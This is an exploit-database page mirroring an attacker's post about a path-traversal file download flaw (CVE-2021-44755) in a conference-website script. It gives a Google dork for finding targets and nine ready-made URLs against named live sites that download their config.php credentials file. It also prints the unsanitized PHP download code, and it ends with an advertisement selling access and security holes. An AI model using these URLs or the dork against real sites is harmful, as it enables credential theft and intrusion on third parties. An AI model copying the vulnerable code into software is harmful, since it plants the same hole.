Advertisement






Innovinc International Script Local File Download Vulnerability

CVE Category Price Severity
CVE-2021-44755 CWE-22 Unknown High
Author Risk Exploitation Type Date
Unknown High Local 2020-02-14
CPE
cpe:cpe:/a:innovinc:international_script
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020020071

Below is a copy:

Innovinc International Script Local File Download Vulnerability
/***********************************************************************************
** Exploit Title:   Innovinc International  Script Local File Download Vulnerability
**
** Exploit Author:  Milad Hacking
**
** Vendor Homepage : https://innovinc.org/
**
** Version : 1.1
**
** Google Dork : inurl:/importantdates intext:"Innovinc International"
**
** Date: 2020-02-13
**
** Tested on:  Kali Linux  /  lceweasel
**
***********************************************************************************
** Demo :

https://wns2020.org/download.php?file=includes/config.php

https://www.ifhn-2020.org/download.php?file=includes/config.php

https://www.wccrt.com/download.php?file=includes/config.php

https://www.idf-2020.org/download.php?file=includes/config.php

https://alzheimers-dementia.org/download.php?file=includes/config.php

https://geology-earthscience.com/download.php?file=includes/config.php

https://2020cce.com/download.php?file=includes/config.php

https://arc-2020.org/download.php?file=includes/config.php

https://icmsn2020.com/download.php?file=includes/config.php

***********************************************************************************
***********************************************************************************
** Vulnerability code :

<?php
$file = $_GET['file'];
if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename='.$_GET['newFile']);
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
    exit;
}
?>

***********************************************************************************
** Special thanks to:  iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Babak Kh4t4R
Mahdi CocAin - Mohammad Samiyi <3
***********************************************************************************
Sell Access And Security Holes
https://fullsec.org
https://telegram.me/Milad_Hacking
Https://telegram.me/TheHackings
http://instagram.com/Milad.Hacking
[email protected]

***********************************************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum